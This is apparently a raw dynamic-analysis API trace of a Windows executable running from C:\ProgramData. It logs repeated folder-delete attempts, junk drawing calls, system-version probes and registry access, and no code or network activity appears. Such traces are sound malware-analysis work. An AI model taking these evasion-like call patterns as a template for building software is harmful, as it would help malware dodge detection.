[0087.352] SetFileAttributesW (lpFileName="ݯĀﺬ\x18㢞盭ĸǧ\x02", dwFileAttributes=0x20) returned 0 [0087.352] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dbb4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.352] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.352] wsprintfA (in: param_1=0x18dbb4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.352] SHFileOperationA (in: lpFileOp=0x18f594*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20260000) | out: lpFileOp=0x18f594*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20260000)) returned 2 [0087.353] SetFileAttributesW (lpFileName="ݯἀŐǧŐǧ↰ǧ\x02", dwFileAttributes=0x20) returned 0 [0087.353] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dfc4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.353] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.353] wsprintfA (in: param_1=0x18dfc4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.353] SHFileOperationA (in: lpFileOp=0x18f754*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x5d0000) | out: lpFileOp=0x18f754*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x5d0000)) returned 2 [0087.354] GetDC (hWnd=0x0) returned 0x301024a [0087.355] CreateCompatibleDC (hdc=0x301024a) returned 0x6010247 [0087.355] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef94 | out: piconinfo=0x18ef94) returned 0 [0087.355] GetDC (hWnd=0x0) returned 0x3010248 [0087.355] CreateCompatibleDC (hdc=0x3010248) returned 0x6010245 [0087.355] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef80 | out: piconinfo=0x18ef80) returned 0 [0087.355] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.355] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e7e4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.355] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.355] wsprintfA (in: param_1=0x18e7e4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.355] SHFileOperationA (in: lpFileOp=0x18f734*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x4d0000) | out: lpFileOp=0x18f734*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x4d0000)) returned 2 [0087.356] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.356] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b184, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.356] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e6e0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.356] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.356] wsprintfA (in: param_1=0x18e6e0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.356] SHFileOperationA (in: lpFileOp=0x18f6f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x03") | out: lpFileOp=0x18f6f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x03")) returned 2 [0087.358] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.358] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.358] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18af80, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.358] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.358] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ad78, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.358] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e4d8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.358] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.358] wsprintfA (in: param_1=0x18e4d8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.358] SHFileOperationA (in: lpFileOp=0x18f6b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd0000) | out: lpFileOp=0x18f6b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd0000)) returned 2 [0087.476] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.476] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.476] GetDC (hWnd=0x0) returned 0xffffffffdf0101fe [0087.476] CreateCompatibleDC (hdc=0xdf0101fe) returned 0xe20101fb [0087.476] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef6c | out: piconinfo=0x18ef6c) returned 0 [0087.476] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.476] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ab70, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.476] GetDC (hWnd=0x0) returned 0x30101fc [0087.476] CreateCompatibleDC (hdc=0x30101fc) returned 0x60101f9 [0087.476] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef58 | out: piconinfo=0x18ef58) returned 0 [0087.476] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e2d0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.476] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.476] wsprintfA (in: param_1=0x18e2d0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.476] SHFileOperationA (in: lpFileOp=0x18f674*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000) | out: lpFileOp=0x18f674*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000)) returned 2 [0087.478] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.478] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e0c8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.478] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.478] wsprintfA (in: param_1=0x18e0c8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.478] SHFileOperationA (in: lpFileOp=0x18f634*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000) | out: lpFileOp=0x18f634*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000)) returned 2 [0087.479] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.479] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a96c, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.479] GetDC (hWnd=0x0) returned 0x30101fa [0087.479] CreateCompatibleDC (hdc=0x30101fa) returned 0x60101f7 [0087.479] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eeb8 | out: piconinfo=0x18eeb8) returned 0 [0087.479] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.479] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a768, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.479] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.479] GetDC (hWnd=0x0) returned 0x30101f8 [0087.479] CreateCompatibleDC (hdc=0x30101f8) returned 0x60101f5 [0087.479] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef30 | out: piconinfo=0x18ef30) returned 0 [0087.480] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.480] SetFileAttributesW (lpFileName="ݯ开䅠䍂", dwFileAttributes=0x20) returned 0 [0087.480] GetDC (hWnd=0x0) returned 0x30101f6 [0087.480] CreateCompatibleDC (hdc=0x30101f6) returned 0x60101f3 [0087.480] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee68 | out: piconinfo=0x18ee68) returned 0 [0087.480] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dec0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.480] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.480] wsprintfA (in: param_1=0x18dec0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.480] SHFileOperationA (in: lpFileOp=0x18f5f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xb50000) | out: lpFileOp=0x18f5f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xb50000)) returned 2 [0087.481] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dcb8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.481] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.481] wsprintfA (in: param_1=0x18dcb8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.481] SHFileOperationA (in: lpFileOp=0x18f5b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20220000) | out: lpFileOp=0x18f5b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20220000)) returned 2 [0087.483] GetDC (hWnd=0x0) returned 0x30101f4 [0087.483] CreateCompatibleDC (hdc=0x30101f4) returned 0x60101f1 [0087.483] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef08 | out: piconinfo=0x18ef08) returned 0 [0087.483] GetDC (hWnd=0x0) returned 0x30101f2 [0087.483] CreateCompatibleDC (hdc=0x30101f2) returned 0x60101ef [0087.483] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efe4 | out: piconinfo=0x18efe4) returned 0 [0087.483] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.483] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dab0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.483] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.483] wsprintfA (in: param_1=0x18dab0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.483] SHFileOperationA (in: lpFileOp=0x18f574*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000) | out: lpFileOp=0x18f574*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000)) returned 2 [0087.484] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.484] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a564, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.484] SetFileAttributesW (lpFileName="ݯ瘀", dwFileAttributes=0x20) returned 0 [0087.484] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.484] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d8a8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.484] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.485] wsprintfA (in: param_1=0x18d8a8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.485] SHFileOperationA (in: lpFileOp=0x18f534*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000) | out: lpFileOp=0x18f534*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000)) returned 2 [0087.486] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.486] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a360, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.486] GetDC (hWnd=0x0) returned 0x30101f0 [0087.486] CreateCompatibleDC (hdc=0x30101f0) returned 0x60101ed [0087.486] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efa8 | out: piconinfo=0x18efa8) returned 0 [0087.486] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.486] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d6a0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.486] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.486] wsprintfA (in: param_1=0x18d6a0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.486] SHFileOperationA (in: lpFileOp=0x18f4f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="Actx ") | out: lpFileOp=0x18f4f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="Actx ")) returned 2 [0087.487] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.487] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a15c, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.488] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.488] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189f54, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.488] GetDC (hWnd=0x0) returned 0x30101ee [0087.488] CreateCompatibleDC (hdc=0x30101ee) returned 0x60101eb [0087.488] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eff8 | out: piconinfo=0x18eff8) returned 0 [0087.488] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.488] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815e4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.488] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189d50, lpFilePart=0x181800 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x181800*="system32") returned 0x13 [0087.488] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d7a4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.488] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.488] wsprintfA (in: param_1=0x18d7a4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.488] SHFileOperationA (in: lpFileOp=0x18f614*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000) | out: lpFileOp=0x18f614*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000)) returned 2 [0087.489] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.489] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189b4c, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.489] GetDC (hWnd=0x0) returned 0x30101ec [0087.489] CreateCompatibleDC (hdc=0x30101ec) returned 0x60101e9 [0087.489] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef44 | out: piconinfo=0x18ef44) returned 0 [0087.489] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.490] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189948, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.490] GetDC (hWnd=0x0) returned 0x30101ea [0087.490] CreateCompatibleDC (hdc=0x30101ea) returned 0x60101e7 [0087.490] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef1c | out: piconinfo=0x18ef1c) returned 0 [0087.490] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.490] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189744, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.490] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0087.490] CreateWindowExA (dwExStyle=0x0, lpClassName="BUTTON", lpWindowName="Press", dwStyle=0x80000001, X=100, Y=100, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x55820000, lpParam=0x0) returned 0x1013e [0087.525] ImmGetVirtualKey () returned 0xe5 [0087.525] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x30401d0 [0087.525] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x50401cd [0087.525] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30401ce [0087.525] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50401cb [0087.525] CombineRgn (hrgnDst=0x30401ce, hrgnSrc1=0x30401d0, hrgnSrc2=0x50401cd, iMode=1) returned 1 [0087.525] CombineRgn (hrgnDst=0x50401cb, hrgnSrc1=0x30401d0, hrgnSrc2=0x50401cd, iMode=4) returned 2 [0087.525] CreateSolidBrush (color=0xff) returned 0x31001cc [0087.525] CreateSolidBrush (color=0xff0000) returned 0x31001c9 [0087.525] DeleteObject (ho=0x31001c9) returned 1 [0087.525] DeleteObject (ho=0x50401cd) returned 1 [0087.525] DeleteObject (ho=0x30401d0) returned 1 [0087.525] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.525] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.525] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.525] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.577] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.577] BeginPath (hdc=0x0) returned 0 [0087.577] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.577] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.577] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.577] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.578] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.578] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.578] VirtualQuery (in: lpAddress=0x5583ef18, lpBuffer=0x180cd0, dwLength=0x1c | out: lpBuffer=0x180cd0*(BaseAddress=0x5583e000, AllocationBase=0x55820000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0087.578] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.578] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.579] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x60401cd [0087.579] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x40401d0 [0087.579] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x204027c [0087.579] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x550401c7 [0087.579] CombineRgn (hrgnDst=0x204027c, hrgnSrc1=0x60401cd, hrgnSrc2=0x40401d0, iMode=1) returned 1 [0087.579] CombineRgn (hrgnDst=0x550401c7, hrgnSrc1=0x60401cd, hrgnSrc2=0x40401d0, iMode=4) returned 2 [0087.579] CreateSolidBrush (color=0xff) returned 0x41001c9 [0087.579] CreateSolidBrush (color=0xff0000) returned 0x3100267 [0087.579] DeleteObject (ho=0x3100267) returned 1 [0087.579] DeleteObject (ho=0x40401d0) returned 1 [0087.579] DeleteObject (ho=0x60401cd) returned 1 [0087.579] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.579] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.579] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.579] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.580] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.580] BeginPath (hdc=0x0) returned 0 [0087.580] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.580] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.580] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.580] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.580] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.580] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.580] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.580] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.580] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x50401d0 [0087.580] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x70401cd [0087.580] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2a0407c8 